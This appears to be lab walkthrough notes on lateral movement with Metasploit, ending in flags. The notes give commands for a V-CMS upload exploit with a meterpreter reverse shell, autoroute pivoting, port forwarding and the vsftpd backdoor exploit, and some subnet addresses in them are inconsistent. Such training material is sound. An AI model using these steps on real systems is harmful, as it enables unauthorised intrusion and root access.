Lateral movements
Lateral movement is a technique that adversaries use, after compromising an endpoint, to extend access to other hosts or applications in an organization.
using metasploit
- Get our ip
- Get machine ip
- Enumerate services in the target machine
- Go further on port 80
- Launch metasploit and search for v-cms
- Use the exploit exploit/linux/http/vcms_upload, configure it and run it
set RHOST 192.64.166.3
set TARGETURI /
set LHOST 192.64.166.2
set payload php/meterpreter/reverse_tcp
run
- You will get a limited meterpreter. Access to the shell and print the flag
- Map other possible interfaces in the machine. Since ifconfig does not work, spawn the shell and try again
route
- Add tunnel from interface 192.64.166.3 (which is session 1 of meterpreter) and the discovered interface, 192.182.147.2 with the utility route:
meterpreter> run autoroute -s 192.182.147.0 -n 255.255.255.0
# you can also add a route out of the meterpreter. In that case you need to specify the meterpreter session: route add 192.182.147.0 .0 255.255.255.0 1
- Background the meterpreter session and check if the route is added successfully to the metasploit's routing table.
- Run auxiliary TCP port scanning module to discover any available hosts (From IP .3 to .10). And, if any of ports 80, 8080, 445, 21 and 22 are open on those hosts.
msf> use auxiliary/scanner/portscan/tcp
msf auxiliary/scanner/portscan/tcp > set PORTS 80, 8080, 445, 21, 22
msf auxiliary/scanner/portscan/tcp > set RHOSTS 192.69.228.3-10
msf auxiliary/scanner/portscan/tcp > exploit
# Give us ports 21 and 22 open at 192.182.147.3
portfwd
- In order to reach the discovered target, we need to fordward remote machine port to the local machine port. We want to target port 21 of that machine so we will forward remote port 21 to the local port 1234. This is done with the utility portfwd from meterpreter
msf auxiliary/scanner/portscan/tcp > sessions -i 1
meterpreter> portfwd
# Tell you there is none configured
meterpreter> portfwd add -l 1234 -p 21 -r 192.182.147.3
# -l: local port
# -p 21 The port we are targeting in our attack
# -r the remote host
meterpreter> portfwd list
# It tells the active Port Forwards. Now, scan the local port using Nmap
- Run nmap on the forwarded local port to identify the service name
meterpreter> background
msf> nmap -sS -sV -p 1234 localhost
# It tells you the ftp version: vsftpd 2.0.8 or later
- Search for vsftpd exploit module and exploit the target host using vsftpd backdoor exploit module.
msf > search vsftpd
msf> use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit/unix/ftp/vsftpd_234_backdoor> set RHOSTS 192.69.228.3
msf exploit/unix/ftp/vsftpd_234_backdoor> exploit
# Sometimes, the exploit fails the first time. If that happens then please run the exploit again.
$> id
# you are root.
- Print the flag